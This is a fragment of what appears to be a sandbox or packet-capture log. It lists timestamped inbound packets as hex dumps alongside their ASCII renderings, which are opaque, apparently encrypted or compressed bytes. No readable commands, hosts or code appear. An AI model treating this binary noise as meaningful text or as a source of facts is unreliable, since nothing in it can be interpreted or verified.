da 20 a5 f4 3e ca 84 8c cf e3 dc 62 2a 7e 28 50 04 be 61 76 ee c6 f4 99 22 c8 11 0e 39 1a 00 Data Ascii: )M<wKrbx:t:eHm2Oz> ^e)g^XcXE[hqC$@w&,Q8e+%E.(7ijk!h;a%XU3z 5v_/`O9=DPHU'kENNQrg/p' >b*~(Pav"9
2022-10-03 14:13:31 UTC	35	IN	Data Raw: 90 48 62 cd 43 c3 57 1d 65 3e 25 f5 c0 e1 32 fd bb 14 3d 77 42 30 d3 ed 91 f8 e7 96 9a 91 00 30 9c 13 fe f5 66 39 9b 60 fa 44 c0 c2 86 b0 a9 ea d2 ee e4 c0 c1 2f 76 ea 43 ed a8 62 16 15 22 8d 6f 9a 80 c8 76 54 7e 03 e1 c4 20 7e 01 3e 64 f7 96 13 25 c2 e3 f1 dc 02 4e b1 c8 87 e6 aa 2a af aa b6 d8 39 13 b6 b4 84 5e ad 13 c6 2a 96 4f d1 ce 98 fc 6a 71 61 82 00 ae 4e b4 80 18 57 8a ed cf bd 34 bc 74 a5 aa 6d 5b 72 3e 60 7b 24 5e 88 59 a8 da 40 76 06 0e f0 94 50 9d b8 39 89 83 0b 8f 22 59 05 6a 24 dd 19 6d 61 82 d6 b9 d7 3e b6 22 a9 cd b9 9a 67 6d 2c 07 10 b1 7a 0f 94 20 ce ef c8 9b c7 2f e5 e8 2b e0 f1 6c c4 21 b8 47 cf 94 d3 e6 4b 4c 88 06 fb 45 02 44 6a b6 36 6d d7 b3 1c f6 27 8e a1 db 6c 98 fb 8f 33 d1 ab 97 47 22 16 ec a5 0f 92 2c bc ae 03 78 78 2e 77 62 Data Ascii: HbCWe>%2=wB00f9`D/vCb"ovT~ ~>d%N9^OjqaNW4tm[r>`{$^Y@vP9"Yj$ma>"gm,z /+l!GKLEDj6m'l3G",xx.wb
2022-10-03 14:13:31 UTC	36	IN	Data Raw: 7b 16 19 86 51 0d 0d 79 41 33 c2 7a a6 29 6d 44 28 0b 42 dd 2a dd f7 03 18 3e cc e5 9a a2 54 b0 33 36 38 be 67 fe 81 62 b9 fd 43 91 c8 6d 25 a8 36 13 5e 1c 48 ee 32 28 40 a8 f1 64 15 07 60 00 f1 b2 a6 1b bc d7 32 5a 19 e8 66 c8 51 fc 6b 24 69 4c 93 ec 1e fb 34 de 7c 60 1d d6 cf a1 87 83 98 3a e6 11 19 c4 91 45 7b fe 5d 17 c1 ad e4 81 b4 14 5d dd 19 5a e0 11 45 d2 73 5a d8 17 44 0b 59 76 c9 02 6e 82 2d 5f a7 53 41 76 fc 02 2c cc 2e 3e 55 c2 a1 86 b2 2d 9f e6 f3 32 a6 44 e3 a6 5e 29 c9 85 ad 11 3e 97 75 c3 32 8d 6e 23 c1 ce d8 9b 6a 86 df b1 34 e6 6b 0d 95 f6 d7 b7 50 f4 9f 0b 36 a3 13 32 50 44 c5 24 a4 7a de 20 b6 8b 9f f4 b5 d6 39 7f fd ab 5f 03 0e cd 72 3f db 2e 11 ac 86 d6 ef 1a 38 4a 41 03 29 9e fd df 0b f8 ec 91 ac ea 4f 8d 93 57 f6 e8 38 a3 57 77 ed Data Ascii: {QyA3z)mD(B*>T368gbCm%6^H2(@d`2ZfQk$iL4\|`:E{]]ZEsZDYvn-_SAv,.>U-2D^)>u2n#j4kP62PD$z 9_r?.8JA)OW8Ww
2022-10-03 14:13:31 UTC	37	IN	Data Raw: 05 69 87 65 ec 1c 5d 7b 7b 92 68 17 8e 45 47 54 fc 78 bf 72 73 4e be fa 92 23 92 1c 04 00 a5 04 a4 f1 3d db 13 11 f7 ff 51 9d 08 bf d9 a8 46 0a cd 07 0e 0a aa 6a d5 50 9d 38 a7 2a 41 61 28 61 62 45 44 cd e0 ac 15 2b 09 3d 2e c4 19 b6 d6 96 c4 f5 ff 05 32 ed 50 e6 e6 6a 2f 9b 6c 5a d5 80 ef 85 a2 9c e0 a9 a5 ec df c9 d8 61 a9 3f fd ad 6f 88 d5 3b 56 52 95 e8 9a 76 45 72 73 96 3b 21 58 1a 53 5f 11 df d7 4d e2 10 26 f5 17 5d b3 e0 a1 ee b5 33 8f ab 8c ff 2e 3f e6 af c7 9e 50 ec 39 35 90 5c d9 ce 3f f5 75 6e 57 82 2c a2 41 e4 96 65 17 8a ed ca b1 24 ad 7c 8d bb 65 46 84 3f 4c 60 30 2e f9 42 a8 d9 5b 96 14 2a f2 9d 53 82 b5 d1 76 ae 2b 8e 65 47 78 01 3c 23 1c 5e 68 ba dc 92 25 34 d2 5d 57 cc 91 be 77 0d 3c 02 12 cc 1d 0f 94 24 d1 f5 fb d8 83 7c a0 df a3 1f f0 Data Ascii: ie]{{hEGTxrsN#=QFjP8Aa(abED+=.2Pj/lZa?o;VRvErs;!XS_M&]3.?P95\?unW,Ae$\|eF?L`0.B[Sv+eGx<#^h%4]Ww<$\|
2022-10-03 14:13:31 UTC	39	IN	Data Raw: dc 42 44 94 76 a3 44 d6 e2 a1 7c 18 f7 7d 9c 60 2f cd 57 25 00 15 c1 12 8b 88 28 42 ee 71 48 28 5f d4 2e 45 cf 4b 19 3a f7 a5 4f dc 75 5c 59 ae 6b b8 77 04 0c 61 44 22 39 d9 0c 34 71 41 31 fa 67 aa ea 6c 68 39 69 39 ba 3b cb ff 3d 59 7e 12 fd 64 a3 67 b0 5e ef 38 af 6b 92 15 9d b8 db 47 8b cc 72 27 69 e0 63 73 1e 5a ef 2d 2a 45 5e f0 59 1f 0f 7f fe f8 87 57 19 98 cb cf 70 43 26 61 c0 2d 64 75 30 70 6e 93 fd 16 f0 fa dd 50 0c 1e 58 78 d3 b8 18 88 2c ea 23 52 cc 99 43 8d e0 6a eb d8 8d e8 81 bd ed 62 2e 1d 4e eb 17 55 c1 73 41 37 1e 77 1e a0 18 7a 1a 6b 8b 3d 73 85 92 43 e4 f1 02 2e fe 5f 3e 79 cc c5 c3 a9 21 9b f1 f3 df af 68 fe ac 53 23 1f 24 80 1d 3d a5 ba 9d cb 73 99 ca 20 c3 e7 91 7d 9b d7 a6 3d e6 6b 0d 9b cc d3 8b b6 21 4b ef f9 be 05 17 58 44 d4 2c Data Ascii: BDvD\|}`/W%(BqH(_.EK:Ou\YkwaD"94qA1glh9i9;=Y~dg^8kGr'icsZ-*E^YWpC&a-du0pnPXx,#RCjb.NUsA7wzk=sC._>y!hS#$=s }=k!KXD,
2022-10-03 14:13:31 UTC	40	IN	Data Raw: c7 b1 6d 5b 22 b1 13 a5 33 76 00 a7 ea 03 a3 2f 9e 1a 9f ee bd 69 2d 43 d5 db 82 a1 29 35 0a 97 c0 d3 52 00 69 20 e6 b6 13 25 a7 5b b7 ec 03 35 93 2b 23 97 44 94 69 87 64 c4 ea 5d 0b 31 cb 3b 77 8e 45 49 8f e4 70 b6 f6 48 0c 64 ff b3 35 bb e0 04 5d 1b b4 a9 cd 37 05 60 00 d6 f2 2c 49 08 bf dd c6 57 0e cb 45 81 bd bd b6 5a 0e cb 38 a6 5d 10 68 a6 d2 40 c1 1e cd e0 99 17 15 22 48 2f c2 60 a1 d5 ed 94 8f d7 54 30 96 06 e5 89 38 39 8a 62 e1 b2 4f 59 a5 57 ba e2 d2 ce e7 f7 89 d3 77 c0 3b cd ac 65 a4 b8 28 81 fe 20 45 c8 f8 f2 a0 0b 2f 2d f7 df 3d 39 62 78 2b 2e a4 2b 80 08 d4 1e d3 0e 7c 0a e7 a3 3f 49 a2 14 62 00 ec a7 b3 cd 98 48 e5 b7 82 54 54 57 79 3d 68 7d 78 99 9a 25 2c fa 32 9e eb 85 a2 14 cb a2 1e a9 56 a5 bb 65 55 bc 3b 4c dd 26 25 d2 34 a8 de 5d 7e Data Ascii: m["3v/i-C)5Ri %[5+#Did]1;wEIpHd5]7`,IWEZ8]h@"H/`T089bOYWw;e( E/-=9bx+.+\|?IbHTTWy=h}x%,2VeU;L&%4]~
2022-10-03 14:13:31 UTC	41	IN	Data Raw: 62 62 a0 20 29 b1 2d 03 fa 85 12 a7 0e fd 0d 10 29 ab 20 77 d4 ad 0f 4e 14 07 c3 d1 0f aa 53 99 c4 1a 73 fe ad f6 3a 66 7a 36 81 84 40 11 17 f6 e0 f1 59 de 84 c0 49 d7 9d 85 a0 13 0b c9 8a 63 04 fc 63 5c 04 3d ed 57 49 d7 15 c8 09 ae 38 38 68 fd 56 5e 2b 35 c1 25 68 d3 c4 1b 70 66 bb 56 e6 63 62 ce ab 4e f8 48 78 58 64 04 3b 04 5a 32 f1 73 41 24 dc e8 ad d7 6c 69 2d 1a 2d 92 b6 dd f3 1c 5e de 1a e5 90 b3 46 c9 0f 3e 38 ad 6d 9a 5e 9c b8 d5 64 44 c0 72 29 6d 14 49 18 0d 44 f2 21 36 7b 4e f3 75 1b 0e fe f9 f0 9e a8 0c a0 dd cc ee 68 e9 6c ea e8 fa 74 3a 6b 48 87 d5 f9 e1 ca d9 46 e1 19 58 78 ba ac 0c 8d 12 7a 08 0a c6 b9 f4 73 e1 4c f8 cd f5 c7 89 a5 11 77 2a cf 5a e0 08 4a cb 6a 50 df 31 54 10 b6 7d ed 33 87 81 25 46 95 93 7a ff d6 0d 37 ef b6 e9 46 c3 cd Data Ascii: bb )-) wNSs:fz6@YIcc\=WI88hV^+5%hpfVcbNHxXd;Z2sA$li--^F>8m^dDr)mID!6{Nuhlt:kHFXxzsLw*ZJjP1T}3%Fz7F
2022-10-03 14:13:31 UTC	42	IN	Data Raw: 25 29 2a e0 1e 34 0b bc 05 24 61 1a a7 52 98 9e 5e 1d 97 c4 20 4c 7c b2 19 2b 7a 13 43 bb a4 22 85 65 d4 23 28 49 59 53 5f cf 98 eb f8 f5 0d 8b 4b 30 72 cb b9 a8 62 1e 76 29 97 08 d4 3e 7b c2 98 c2 16 75 a4 b9 97 98 ef b0 61 2f 4c 5d fa 09 a3 9d a3 2b 9f c3 67 c4 69 c3 28 fc bb 1d cd ac 73 fa e7 0a bd 4b e6 f9 92 22 91 67 82 75 cf 85 3a 7b 71 9a 42 43 8a 03 6f 32 7c 59 04 79 ff 1b ea d1 97 31 a5 b0 50 08 87 cd a0 e7 3d 29 32 02 e2 e0 b6 d3 18 bc cc ba 06 1f ca 72 ee d2 db bd 58 6b 8e 37 b7 58 08 5a 9b 65 60 3e 0f dd f1 a7 0b eb 09 47 2e c4 19 94 fc 1f 9e f5 f5 2d 3e 95 1d f6 f0 7f 36 e5 64 ec ba cb bf ae ba b4 e6 94 d3 e5 db ed 6a 76 c6 48 a8 86 61 aa dd 61 dc 5b e9 9b df 4c 2a 10 1d f5 30 32 43 1d 28 77 4a 61 2b ba 6d 0d 0a d4 8d 4e ab d9 84 f1 8f 56 37 Data Ascii: %)4$aR^ L\|+zC"e#(IYS_K0rbv)>{ua/L]+gi(sK"gu:{qBCo2\|Yy1P=)2rXk7XZe`>G.->6djvHaa[L02C(wJa+mNV7
2022-10-03 14:13:31 UTC	44	IN	Data Raw: a8 45 50 b6 05 46 e9 e0 de 44 e4 67 cd 93 8d a1 07 f4 b1 63 95 01 8a 6b 6d 9c 2e fc 05 5a eb 00 26 58 e0 ce 5a 8e 92 8b 54 68 74 4b ab 14 ba a9 1c c8 93 84 de 62 66 a0 db 29 b1 21 27 fa eb fc 8f 39 f9 0f 0c 8a 41 31 70 e9 29 0d 33 f6 11 c1 ae d4 ae 2e 7e 4a ad 60 26 9a 2c 69 68 69 b0 88 4b 40 10 6a 10 9b 28 5d dc f3 10 43 4d 84 f5 42 68 d2 cd 88 1c f5 f7 74 8e 9c 41 40 54 32 07 17 bb cc 83 76 23 13 0d 5a 4a 07 d9 b8 c4 6e c5 4d 1e 1f c7 bb 42 f8 75 31 b2 ab 4e f6 62 a9 bc 64 0e 2e 1e 4c 61 fa 71 41 26 44 d2 c5 15 6d 68 33 0c 42 5b 2a dd f7 14 0d 9a 1a e5 9e b4 49 c6 c4 3e 38 ab e1 56 e7 5e b9 d1 46 90 bb 92 2f 7e 1a 76 a1 1a b6 e3 2d 24 20 63 f0 75 17 77 b7 ff f0 94 ab 63 55 c9 e4 76 7c 17 60 36 42 fa 72 43 b9 45 93 f7 79 27 cb df 5a 6e 09 25 9d bb b8 1c Data Ascii: EPFDgckm.Z&XZThtKbf)!'9A1p)3.~J`&,ihiK@j(]CMBhtA@T2v#ZJnMBu1Nbd.LaqA&Dmh3B[*I>8V^F/~v-$ cuwcUv\|`6BrCEy'Zn%
2022-10-03 14:13:31 UTC	45	IN	Data Raw: 9c 56 96 e6 40 12 42 ec ed 41 5b 97 9b 94 b2 2c 67 92 3d d6 bc 91 eb 34 35 88 a9 db e8 26 5a 05 81 4b a6 39 80 9c 6d de c4 68 ab 3a e8 ee 75 39 1a 8d 0e 75 a0 24 02 b5 96 6a 32 64 68 16 20 79 38 9e f9 9f 8f 5a 63 26 cf 0c 41 15 13 6d 2b 70 34 78 b6 9b 3d 97 6b cf 3b a3 5b b9 0b 85 18 51 e3 d5 cf 11 a8 54 c5 70 c1 61 c7 b0 34 76 22 a1 19 df 2f 71 f6 b0 3b 3f 75 ac 1c 1a 9f ee a3 50 3e 58 06 d7 95 a3 e1 a9 03 9f d5 74 d5 3e 3e 2c fc b1 3b cd bc 44 89 1b 0b 97 36 1b 33 93 28 bd 78 82 0b 0f eb 5d 71 62 89 0c 78 9d 5e 43 2a 63 66 a1 86 fe 37 b0 f8 82 3e 92 2c 05 00 a5 3b ae f8 28 16 7b 13 f7 ec 33 e2 f6 be f1 a4 55 1f d1 45 18 bc bd b6 4b 65 82 1b b5 4c 1d 70 33 7d 9e 3f 32 cb f6 bb 17 24 75 51 2f d5 08 8f f5 13 9f d9 f4 10 3b 87 02 30 f5 65 26 a8 7b f6 ba d0 Data Ascii: V@BA[,g=45&ZK9mh:u9u$j2dh y8Zc&Am+p4x=k;[QTpa4v"/q;?uP>Xt>>,;D63(x]qbx^C*cf7>,;({3UEKeLp3}?2$uQ/;0e&{
2022-10-03 14:13:31 UTC	46	IN	Data Raw: 2d 49 c5 9a 25 e7 76 49 9c e9 f1 41 71 52 79 b4 25 75 c1 bf 23 08 37 b9 bc c0 97 a1 6a 62 dd 28 96 5e 60 f7 9b a1 a5 0f 93 65 b9 b1 23 7d 68 05 7d 79 b2 b0 c3 4c 69 45 94 e3 4c c1 16 dd 55 e9 05 15 fd 54 ab 7d fc b5 09 54 2c 99 74 6f 88 3b e7 15 7d ea 2c 27 34 25 c5 45 b3 ab 90 54 79 7c 6c 51 15 5c aa 04 db 88 84 cf 79 7b b1 32 28 9d 21 56 d1 97 15 89 33 e2 37 09 ec ab 20 6b f2 32 f0 4f 38 1b d0 a1 cc 7c 40 96 55 b7 77 3f ba 3d 32 76 73 c3 b8 67 4e 13 06 ff b3 e4 58 de 8a c2 52 52 95 9b b9 68 c3 d2 9c 99 14 db 77 9d 8d 35 e1 44 29 12 2a 36 0c ae 74 02 6b d4 e0 b0 fc 24 e9 25 75 f5 4c 1c bc 64 ba 42 8f 77 4a 43 bd 5d fd 64 fa 13 66 0e 2c 67 80 1a 1e 7b 6d 24 d5 41 b9 d8 47 2d 3d 26 75 b8 2a db 9c d8 76 7e 10 c8 b1 a6 63 f0 22 3e 3e c0 a1 e1 88 96 94 d3 67 Data Ascii: -I%vIAqRy%u#7jb(^`e#}h}yLiELUT}T,to;},'4%ETy\|lQ\y{2(!V37 k2O8\|@Uw?=2vsgNXRRhw5D)6tk$%uLdBwJC]df,g{m$AG-=&uv~c">>g
2022-10-03 14:13:31 UTC	48	IN	Data Raw: 24 82 93 8c f6 6b c7 27 ed d8 55 5e 2e 34 ca 5a 30 b7 f8 39 ee c0 a5 05 08 3d 5f 47 15 3e 8e 61 e6 14 f6 13 83 86 ea 4f f5 94 b6 f7 ec 27 dc 12 80 15 e8 22 cb b3 5c 87 e9 48 77 8d e8 ed 5a 4f 84 60 fa 43 2e 70 8b 29 d3 c2 4a f5 3e c1 8b 93 db 4d 94 0d f5 7f b4 53 00 99 8f 71 c4 d0 e5 a1 3a e8 ef 24 3f 30 9d 0a 7e b4 2e 01 82 e2 0b 74 64 66 20 24 6b 3d a5 69 9b 8f 82 72 22 c5 a0 46 13 76 0f 38 74 0d 91 b5 b3 f4 96 7a c1 34 c7 51 4b 0b b6 32 08 e8 d4 c5 16 97 b9 c8 7c d1 ac c3 b7 0f 72 3f 4f 18 f3 28 79 ce 66 3c 09 66 a6 af 0b 9b f7 4e 61 17 74 4b bd 9e a2 9d a3 6f ad c3 67 ce 06 7f 29 fc f1 60 ff a7 5b bd e5 0a bb d4 0c a0 ba 12 b7 69 8d d3 d3 3c d0 4a 71 90 12 47 97 56 47 3b 69 7d a2 86 fe 37 b9 f2 9a 04 99 fe 17 04 af 39 a4 fd c9 04 4c 16 cd 18 37 d3 0c Data Ascii: $k'U^.4Z09=_G>aO'"\HwZO`C.p)J>MSq:$?0~.tdf $k=ir"Fv8tz4QK2\|r?O(yf<fNatKog)`[i<JqGVG;i}79L7
2022-10-03 14:13:31 UTC	49	IN	Data Raw: a5 18 d9 9a fd 88 af 0d 3b 61 42 0b e6 25 dd 17 61 67 8e ce 34 f7 36 a9 3a 44 c3 84 91 7b 1d 2c 0d 68 d3 0d 27 6d 24 d1 ff c4 b3 4a 0f ed f7 3a 0d e0 51 c7 1c 3c 48 c8 98 fb ce a3 44 9e f2 eb 64 10 43 16 5f 37 7c d5 bd 35 19 29 cd 78 f1 69 aa 57 7e db 41 5d 85 77 2b 07 9d bc 60 4f 77 bc a4 03 63 1c db 6d 62 a7 8d 39 5b 54 54 32 9e 22 1e 1d df 4e f1 00 1c 86 03 1c 6e e4 b7 0c 54 11 50 7e 61 43 33 eb 3c 8d fc da 37 f3 b2 ff 5a 8a b9 98 45 79 73 6a bd 05 63 73 0d d9 85 95 cf ec d3 a0 35 29 b1 21 56 34 97 15 85 2a e8 1c 0f e6 ba 5e a4 ed 2b 04 5d 02 00 d7 82 1b ab 53 97 62 e4 66 24 bc 04 d5 68 69 3b d6 06 40 11 1d e7 8c 21 79 d0 00 d1 42 0d 4e 88 a2 68 cd d9 07 56 15 f7 75 99 85 3f f5 44 29 12 05 e0 d9 83 76 23 6d 9f 8f 4b 03 d1 d0 3c 7f dc 58 07 1f b2 ba 42 Data Ascii: ;aB%ag46:D{,h'm$J:Q<HDdC_7\|5)xiW~A]w+`Owcmb9[TT2"NnTP~aC3<7ZEysjcs5)!V4*^+]Sbf$hi;@!yBNhVu?D)v#mK<XB
2022-10-03 14:13:31 UTC	50	IN	Data Raw: 58 61 9a 3a a6 57 e8 61 28 65 9c 3c 1e cd ec a8 1c 3d 66 4a 2f c4 11 90 d4 ed 34 f6 ff 01 1f 96 0c e6 3f 6d 39 8a 64 ed ba c1 ee 85 a8 ba e2 d2 ff ec d9 cd d1 77 2d 4b fc ad 94 ad c2 31 87 70 97 93 e5 76 45 77 0f c5 3f 21 dd 0c 39 62 fd 21 28 a3 2a 0f 0a fb 97 5d b9 c8 96 ff b1 2e af aa b6 d6 30 06 a3 b3 d6 9a 4a 12 38 19 8a 55 c6 ee 5f f9 6e 7d 9b 83 3d a6 54 1a 97 49 39 88 e4 e3 2c 15 af 76 ae a1 76 42 8c 2e 48 6a d8 24 fe 49 af c9 26 b2 a2 11 26 08 69 82 b2 c6 84 b3 14 88 72 5d 7c 1a da dc 31 7d 68 98 b4 b1 d0 5c ae 13 be cd 95 9e 79 2e 39 02 6f c8 05 f1 95 08 d7 ea bb 9e de 2d e9 f7 2a 1a e6 be c3 26 2e 4f cd 83 db f7 5e 59 60 f9 d6 6b 2a 56 41 c5 c9 83 20 a4 12 08 35 92 af f0 18 a4 46 73 49 2e 81 95 61 32 19 a8 f8 0b 92 76 bc bf 1d 75 8d 04 40 1f b9 Data Ascii: Xa:Wa(e<=fJ/4?m9dw-K1pvEw?!9b!(].0J8U_n}=TI9,vvB.Hj$I&&ir]\|1}h\y.9o-&.O^Y`k*VA 5FsI.a2vu@
2022-10-03 14:13:31 UTC	51	IN	Data Raw: 02 3c 1f d2 0b 12 66 57 be db 69 b2 c0 f0 79 35 17 2f 26 3b d1 e9 00 ea 6f 16 f2 b2 00 4b bd 2a 18 27 a2 7c ee 88 8d b7 c7 b2 93 ec 71 38 6d 11 62 4e 13 5d ff d3 23 7f a2 da 70 25 86 88 01 0f 98 dd 27 b4 c9 e6 58 52 eb 4e d5 42 fa 7e 32 79 2b 94 fc 16 e5 e0 cc 60 6e 1e 65 78 bb b8 9e 99 3a f7 1e 06 e7 bb 54 7b f6 b8 e8 ec 83 f0 85 a5 1b 7b fc 18 76 e8 7d b7 c0 7b 50 c2 06 57 13 af 61 1b 1a 47 83 32 4c b3 8d 70 06 fc 2e 24 cf a3 14 81 cf de 92 b5 2c 9b fd 85 ea af 44 f8 84 41 22 37 97 b1 1f 37 bf 6d 87 c7 f5 91 dc cf d4 c7 b8 40 97 df b6 df 19 46 29 ea 09 d0 a0 1a 30 78 f8 c9 b4 12 df 59 68 d6 34 bf 84 d7 1a 4b 92 a0 fe a2 cb 31 68 f0 ab 5f 03 1c e5 78 0b 05 fa 42 d5 86 d6 e1 23 3d 46 64 14 21 f2 ec d7 14 71 12 90 91 ed 46 dd 9e 57 fe f7 d3 cc 3b 98 11 84 Data Ascii: <fWiy5/&;oK*'\|q8mbN]#p%'XRNB~2y+`nex:T{{v}{PWaG2Lp.$,DA"77m@F)0xYh4K1h_xB#=Fd!qFW;
2022-10-03 14:13:31 UTC	52	IN	Data Raw: 69 8d 6f 1a f0 4c 7e 1e 61 12 4d 84 4c 2c c9 79 79 b5 a4 21 11 b7 d6 95 3c d5 81 04 00 a5 f4 a8 e0 58 ce 61 13 ec dd 2c c0 08 be c1 aa 57 0c da 28 d4 a7 e2 bc 56 61 9d 38 a6 55 1d 6f 28 04 0f 3e 14 cd e0 a8 1c 26 56 40 2f d7 12 90 d4 64 9e f5 ee 03 4e ed 0c e6 e2 10 45 8a 68 e9 c4 b6 ee 85 ac d5 f3 d3 ff ea d3 cf d9 74 d4 4b 93 bf 64 ae c4 22 8c 62 97 97 c5 78 40 5e d0 f5 3a 27 54 1f 35 60 71 4e 38 b3 3c 1a 19 19 00 8b 34 f9 96 ee b4 2a 58 bd 89 df 21 1b a3 bd c3 10 e7 fe 39 24 8b 4d d0 40 3e e0 63 7c 95 95 04 68 4d e4 90 76 39 9b e6 dd 5c 17 bc 7a b4 bd 49 51 a4 c9 4e 71 20 34 d9 d5 20 de 4c 69 3d d6 f1 85 52 f1 46 c6 88 a5 7d 9d 78 5b a2 11 f2 50 2c 72 6a 90 cd bc cf 38 ad 35 53 42 22 86 64 2c 34 13 77 42 aa 1e 91 35 d4 7b 6c 81 cd 28 c5 3d 3b 1e f6 53 Data Ascii: ioL~aML,yy!<Xa,W(Va8Uo(>&V@/dNEhtKd"bx@^:'T5`qN8<4*X!9$M@>c\|hMv9\zIQNq 4 Li=RF}x[P,rj85SB"d,4wB5{l(=;S
2022-10-03 14:13:31 UTC	53	IN	Data Raw: 45 57 9d 82 a2 79 d8 d6 84 99 14 db 73 89 8d 27 fe 5a 21 07 15 d9 07 9d 7c d7 6f c0 50 5b 05 cc 15 36 68 da 42 0f 7a 66 ab 48 e9 89 4b 7e a3 76 1f 9e 2d a7 78 1d 20 08 5f 10 01 63 bf 23 e6 6e bb d2 56 f1 c7 f1 c6 a5 39 ce f9 16 67 74 0c 1b 9b 8e 48 aa 33 34 38 be 65 fe 90 62 b9 fd 4e b9 c5 4a 63 80 e1 9d 56 36 5c e1 36 12 5a a0 ab 74 1d 18 fd fe f0 8f ab 12 b6 df 8b 84 69 e9 6c dd 1d c9 7c 32 6d 2b 9e fc 16 e9 c0 d9 78 c6 1e 58 72 93 4b 19 99 30 eb 7b d3 cd 91 5e 60 e5 57 ed d4 a9 1f 8b a5 15 74 8f 1e 5a e0 0f 4a c7 6a 5c df 1c f9 02 a1 63 f1 33 9c 80 25 4a a2 81 7d d0 05 00 26 e2 b6 b2 52 c8 dc e8 a1 2b 8a ff fc 36 22 87 f2 ae 40 80 26 82 95 09 1f 7f 6c 87 cd 62 95 c8 f6 3b c9 93 6c 80 5a a9 21 18 6b 32 9f f6 d7 b6 14 99 70 f2 dd a8 2d d6 59 44 de 3d b7 Data Ascii: EWys'Z!\|oP[6hBzfHK~v-x _c#nV9gtH348ebNJcV6\6Ztil\|2m+xXrK0{^`WtZJj\c3%J}&R+6"@&lb;lZ!k2p-YD=
2022-10-03 14:13:31 UTC	55	IN	Data Raw: bc 1e 67 28 ae 14 21 2e 5d dd c3 13 15 75 a4 bc 1f 80 e1 a3 6b 3b 49 42 cd a7 5d 9c 85 12 8d ca 7f 18 0e 69 38 f8 99 c2 dc a7 51 a2 d6 19 b0 24 22 f2 8d 0e 49 68 ab 42 cd fd 8b 7c 1e 8f 12 4d 88 42 2c 24 79 79 b9 17 06 1a be f0 84 ef d5 1a 05 00 a5 47 bd e6 37 03 b6 1e f9 d0 3f cb 08 ae d6 b4 a9 0f f6 60 d3 d2 a0 bd 58 67 8b 0b 3d 48 14 72 23 65 71 35 01 89 1e a9 30 31 6f 5b 26 fa 43 92 d4 ed 81 b0 ec 0a 30 87 07 f9 f2 90 38 a6 61 d5 e5 c5 ee 85 b7 af f1 d9 ff fd d4 d2 e5 89 c7 64 da a4 72 78 c5 5e 97 71 97 95 c7 19 5a 77 1c f3 55 d8 53 0c 33 75 a3 4e d2 b3 3c 16 61 de 16 5d bf 1e 9b f1 80 2a 5a ab 8b de 37 56 59 b2 eb 96 59 fb ef 38 9d 18 ca c5 89 e5 7e 71 a6 7d 2d 8e 5d f5 9e 66 3b 9d 3b 5a cd 0a ae 7c a3 a4 5f 55 87 3f 5d 7a 39 29 2c 58 84 d7 74 66 11 Data Ascii: g(!.]uk;IB]i8Q$"IhB\|MB,$yyG7?`Xg=Hr#eq501o[&C08adrx^qZwUS3uN<a]*Z7VYY8~q}-]f;;Z\|_U?]z9),Xtf
2022-10-03 14:13:31 UTC	56	IN	Data Raw: be b6 44 29 b1 2b 3a ff 85 1e 8f 28 f6 12 36 09 aa 1d 61 ea 44 11 4f 14 17 d0 ad b9 52 52 9d 40 b2 49 37 b1 2c 38 62 76 32 47 4a 6c 01 06 f1 98 21 4e 08 11 be 5c 4c 8e 8e bd 78 c1 c2 8a 76 1e e8 7e 74 9f 02 f0 52 31 83 a2 c1 15 54 ac 46 70 ed 5a 4c 1c d0 d0 2e 6e d4 42 03 52 98 bb 6e fb 4f 60 a8 54 b1 ed 43 c1 53 64 1f 21 17 75 e4 1f 5d 52 21 c3 72 7c 46 7b b2 2e d8 b4 8b 2a dd f2 1a 69 42 09 ee 9a b3 40 a2 35 c0 39 83 66 e9 06 2b ab d5 53 84 d3 79 2f 6f 15 7d 77 e2 43 cf 21 33 59 ba b1 d2 e3 e7 8c e1 d9 8d a2 18 a5 c2 fb 53 96 e8 4a cf 41 74 c3 39 62 92 49 ee 12 fc e8 cc 5b 6c 0f 53 67 98 46 19 b5 31 e5 01 1d 1a 00 47 77 fe 62 fa cb 81 f9 82 ba 2f 9d 03 35 4f e9 16 8f c2 72 4d 1f 8e 8d 10 29 c0 db 02 96 7e da 5f 8e 96 62 f8 ec 09 30 1a a0 13 56 df cf e2 Data Ascii: D)+:(6aDORR@I7,8bv2GJl!N\Lxv~tR1TFpZL.nBRnO`TCSd!u]R!r\|F{.*iB@59f+Sy/o}wC!3YSJAt9bI[lSgF1Gwb/5OrM)~_b0V
2022-10-03 14:13:31 UTC	57	IN	Data Raw: 10 b7 9f 09 33 64 6d 07 26 10 28 b7 59 9a f2 48 73 22 c1 28 6c 0c 6c 0a 2e 70 24 57 af 4d f5 ba 7a c7 56 21 51 67 01 a2 4b 70 e2 d5 c1 c6 8a 78 d6 75 cb ae c2 ab e0 77 0f bb 1a d9 13 30 29 4f cf 09 66 a7 af 0b 9a f6 4e 61 17 5d 5f df 8f b0 98 a9 12 8b d8 99 cf 2a 75 2f ea 8f bc dc a7 5b a1 f6 0f bb 35 36 e4 6c 29 9b 7e 85 1f d2 eb 5d 7f 73 eb 04 4c 8e 41 4b 2d 7b 51 5c 79 ff 11 a0 e9 96 35 ab e5 1c fe ae 04 ae e4 20 df 77 c5 6b c6 2c c0 09 b3 c4 b9 52 0e cb 68 c3 43 bc 90 5b 79 8e 3d a6 46 18 7e 21 9b 61 12 18 c5 ca b7 16 2e 63 4a 3e c1 0d 6e d5 c1 8c f7 fd 7a 27 97 0c e2 e5 b8 44 9d 69 ed be de e7 96 ad ba f3 d7 e9 12 de e1 d2 60 d5 4d fc bc 60 b1 c9 cf 89 5c 95 b8 c5 4e ca 88 e3 0a 33 22 6d cf c7 9d 86 29 02 b2 3c 0f 3e c1 17 6e b9 c8 96 e7 b5 39 40 bd Data Ascii: 3dm&(YHs"(ll.p$WMzV!QgKpxuw0)OfNa]_*u/[56l)~]sLAK-{Q\y5 wk,RhC[y=F~!a.cJ>nz'Di`M`\N3"m)<>n9@
